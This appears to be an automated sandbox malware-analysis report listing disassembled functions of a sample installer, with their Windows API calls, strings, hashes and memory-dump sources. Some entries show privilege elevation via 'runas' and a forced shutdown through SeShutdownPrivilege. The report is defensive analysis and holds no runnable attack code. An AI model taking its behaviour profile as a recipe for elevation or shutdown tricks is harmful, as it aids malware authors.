                                                                                                      • Opcode Fuzzy Hash: b3cb95de96f0a494fe77a0225261b47a74f516519aada3d90b4a318c7d3773ef
                                                                                                      • Instruction Fuzzy Hash: 02711370A04348AEDB11DB69CC41B5EBBF8EB15705F1084BAB944FB282DB7859488B69
                                                                                                      Function 00478420 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 94COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0047828C: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02072BDC,?,?,?,02072BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
                                                                                                        • Part of subcall function 0047828C: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                                                                        • Part of subcall function 0047828C: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02072BDC,?,?,?,02072BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                                                                        • Part of subcall function 0047828C: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02072BDC,?,?,?,02072BDC), ref: 004782E8
                                                                                                        • Part of subcall function 0047828C: CloseHandle.KERNEL32(00000000,?,?,?,02072BDC,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                                                                        • Part of subcall function 00478364: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004783F6,?,?,?,02072BDC,?,00478458,00000000,0047856E,?,?,-00000010,?), ref: 00478394
                                                                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 004784A8
                                                                                                      • GetLastError.KERNEL32(00000000,0047856E,?,?,-00000010,?), ref: 004784B1
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004784FE
                                                                                                      • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478522
                                                                                                      • CloseHandle.KERNEL32(00000000,00478553,00000000,00000000,000000FF,000000FF,00000000,0047854C,?,00000000,0047856E,?,?,-00000010,?), ref: 00478546
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                                      • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                                      • API String ID: 883996979-221126205
                                                                                                      • Opcode ID: 7bc79704bed3dd733a1086ace77ac7314c1c869dae30f57a13a5b111f7ab0a8e
                                                                                                      • Instruction ID: be90243bdd9c3757315ff9bbcfcad83cd6a8df60a98d136a70e83fac94f3d3e4
                                                                                                      • Opcode Fuzzy Hash: 7bc79704bed3dd733a1086ace77ac7314c1c869dae30f57a13a5b111f7ab0a8e
                                                                                                      • Instruction Fuzzy Hash: E0314670A40609BEDB11EFAAD845ADEB6B8EF05314F50847FF518E7281DB7C89058B19
                                                                                                      Function 0042286C Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                                                      • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendShowWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1631623395-0
                                                                                                      • Opcode ID: ba2239a6b7e39db5a6c256e0bd052b844ec1d952261cb85ab3a20d26880a6eee
                                                                                                      • Instruction ID: ac1ceeab966790095f9612ce7a7db5e594191b89627cdcc61fab65d1acc55ab9
                                                                                                      • Opcode Fuzzy Hash: ba2239a6b7e39db5a6c256e0bd052b844ec1d952261cb85ab3a20d26880a6eee
                                                                                                      • Instruction Fuzzy Hash: 79914071B04214BFD711EFA9DA86F9D77F4AB04314F5500BAF504AB3A2CB78AE409B58
                                                                                                      Function 00418394 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 004183A3
                                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                                                      • GetWindowRect.USER32(?), ref: 004183DC
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                                                      • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                                                      • ScreenToClient.USER32(00000000), ref: 00418408
                                                                                                      • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                      • String ID: ,
                                                                                                      • API String ID: 2266315723-3772416878
                                                                                                      • Opcode ID: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                                                      • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                                                      • Opcode Fuzzy Hash: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                                                      • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                                                      Function 004555D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004555FE
                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455625
                                                                                                      • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045562A
                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 0045563B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                      • API String ID: 107509674-3733053543
                                                                                                      • Opcode ID: 905e5c4f0c040865ada5a790a5680192090f128290145b13f19b3701cccf3d3d
                                                                                                      • Instruction ID: f0f78ca649e8ddc1473c2e21848b41e7847a09c75f53dffa28e6f5675cd8c776
                                                                                                      • Opcode Fuzzy Hash: 905e5c4f0c040865ada5a790a5680192090f128290145b13f19b3701cccf3d3d
                                                                                                      • Instruction Fuzzy Hash: 32F0F670284B42B9E610AA758C13F3B21C89B40B49F80083EBD09EA1C3D7BDC80C4A2F
                                                                                                      Function 0045D4EC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D4F5
                                                                                                      • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D505
                                                                                                      • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D515
                                                                                                      • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F47B,00000000,0047F4A4), ref: 0045D53A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$CryptVersion
                                                                                                      • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                                      • API String ID: 1951258720-508647305
                                                                                                      • Opcode ID: 6323a5a980eb8feb456ca02504bfb6ad995229d531f09a6584140c28355fd360
                                                                                                      • Instruction ID: 2c2546d05897d0e560449e180de6b9da44e6f0241588afb6de3da162f6531889
                                                                                                      • Opcode Fuzzy Hash: 6323a5a980eb8feb456ca02504bfb6ad995229d531f09a6584140c28355fd360
                                                                                                      • Instruction Fuzzy Hash: 3AF012F0940704EBEB18DFB6BCC67623695ABD531AF14C137A404A51A2E778044CCE1D
                                                                                                      Function 00497A74 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90,?,?,00000000,0049B628), ref: 00497ACB
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00497B4E
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000), ref: 00497B66
                                                                                                      • FindClose.KERNEL32(000000FF,00497B91,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90), ref: 00497B84
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$AttributesCloseFirstNext
                                                                                                      • String ID: isRS-$isRS-???.tmp
                                                                                                      • API String ID: 134685335-3422211394
                                                                                                      • Opcode ID: ba647548f34564e7f56f6c808fa7faec3af05a969934c2433d5159a38f0bbcda
                                                                                                      • Instruction ID: b2847bb1a44685988a55541ee7ac685ebeb66ffb5e30493f66813578f7a68db2
                                                                                                      • Opcode Fuzzy Hash: ba647548f34564e7f56f6c808fa7faec3af05a969934c2433d5159a38f0bbcda
                                                                                                      • Instruction Fuzzy Hash: A63165719146186FCF10EF65CC41ADEBBBCDB45318F5084F7A808A32A1E638AE458F58
                                                                                                      Function 004573CC Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 238windownativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457449
                                                                                                      • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457470
                                                                                                      • SetForegroundWindow.USER32(?), ref: 00457481
                                                                                                      • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,0045775B,?,00000000,00457797), ref: 00457746
                                                                                                      Strings
                                                                                                      • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575C6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                                      • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                                      • API String ID: 2236967946-3182603685
                                                                                                      • Opcode ID: fe95ac23089f8abddac86e3d9ae11b4981b9e88786854755ce7e63a50dbcddc8
                                                                                                      • Instruction ID: 5bc10c0d354cae83c82450a0913647aad13fd3ad71d4eb48676ad76960377df7
                                                                                                      • Opcode Fuzzy Hash: fe95ac23089f8abddac86e3d9ae11b4981b9e88786854755ce7e63a50dbcddc8
                                                                                                      • Instruction Fuzzy Hash: D9910034608204EFD715CF54E991F5ABBF9EB89305F2180BAED0897792D638AE04DF58
                                                                                                      Function 00455DF8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F37), ref: 00455E28
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E2E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                      • API String ID: 1646373207-3712701948
                                                                                                      • Opcode ID: b5f149e20a31f3d313834126475bcf244ddb8ed42aa7b007c000aa6233a22d25
                                                                                                      • Instruction ID: 12dfdd1b414f9b5fa57bb507e68127e36b1c1a940f154b23c6ee37fdedd7ee09
                                                                                                      • Opcode Fuzzy Hash: b5f149e20a31f3d313834126475bcf244ddb8ed42aa7b007c000aa6233a22d25
                                                                                                      • Instruction Fuzzy Hash: 66415171A04649AFCF01EFA5C8929EFB7B8EF49304F508566F800F7252D6785E09CB69
                                                                                                      Function 00417CE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 00417D1F
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                                      • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Placement$Iconic
                                                                                                      • String ID: ,
                                                                                                      • API String ID: 568898626-3772416878
                                                                                                      • Opcode ID: 419626ddcb93f619c016e5eb608395eb97e33a9638738bd346f5ce49c9230b00
                                                                                                      • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                                                                      • Opcode Fuzzy Hash: 419626ddcb93f619c016e5eb608395eb97e33a9638738bd346f5ce49c9230b00
                                                                                                      • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
                                                                                                      Function 00464048 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,00464205), ref: 00464079
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 00464108
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 0046419A
                                                                                                      • FindClose.KERNEL32(000000FF,004641C1,004641BA,?,00000000,?,00000000,004641D8,?,00000001,00000000,00464205), ref: 004641B4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 4011626565-0
                                                                                                      • Opcode ID: ae980c7907389dfafffe65f94222ffd443bde6570b10391f97ae33023227fa5d
                                                                                                      • Instruction ID: 2652c2d8e8669354d55d474f1d59e7b06630ff05c6329d0403030a32038cf055
                                                                                                      • Opcode Fuzzy Hash: ae980c7907389dfafffe65f94222ffd443bde6570b10391f97ae33023227fa5d
                                                                                                      • Instruction Fuzzy Hash: 1E418770A00618AFCF10EF65DC55ADEB7B8EB89705F5044BAF804E7381E67C9E848E59
                                                                                                      Function 004644C4 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,004646AB), ref: 00464539
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 0046457F
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464634
                                                                                                      • FindClose.KERNEL32(000000FF,0046465F,00464658,?,00000000,?,00000000,00464676,?,00000001,00000000,004646AB), ref: 00464652
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 4011626565-0
                                                                                                      • Opcode ID: 8a1b155a3f91a4aa9fbf35308e738363c59e35d7d54ec670dc4b6b29b87b573a
                                                                                                      • Instruction ID: 7635123f594c8b6db569002a9bb01bf8fa96c74c2cf80da52efac59b167f1e7c
                                                                                                      • Opcode Fuzzy Hash: 8a1b155a3f91a4aa9fbf35308e738363c59e35d7d54ec670dc4b6b29b87b573a
                                                                                                      • Instruction Fuzzy Hash: D8416171A00A18EBCB10EFA5CC959DEB7B9EB88305F4044AAF804A7351E77C9E448E59
                                                                                                      Function 0042E944 Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E966
                                                                                                      • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E991
                                                                                                      • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E99E
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9A6
                                                                                                      • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F2B,00000000,00452F4C), ref: 0042E9AC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 1177325624-0
                                                                                                      • Opcode ID: db388d08dfb8c48f2ab297580a8778080e815d8e8b0b37ff587e49df53ef3670
                                                                                                      • Instruction ID: 40e29ed62a0e901db822078ff48c294e58af048427126d47a83bbc7ee0829aa9
                                                                                                      • Opcode Fuzzy Hash: db388d08dfb8c48f2ab297580a8778080e815d8e8b0b37ff587e49df53ef3670
                                                                                                      • Instruction Fuzzy Hash: 4BF090B23A17207AF620B57A6C86F7F418CC785B68F10823BBB04FF1C1D9A85D05556D
                                                                                                      Function 004833BC Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • IsIconic.USER32(?), ref: 004833FA
                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00483418
                                                                                                      • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048343A
                                                                                                      • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,004828DE,00482912,00000000,00482932,?,?,?,0049C0A4), ref: 0048344E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Show$IconicLong
                                                                                                      • String ID:
                                                                                                      • API String ID: 2754861897-0
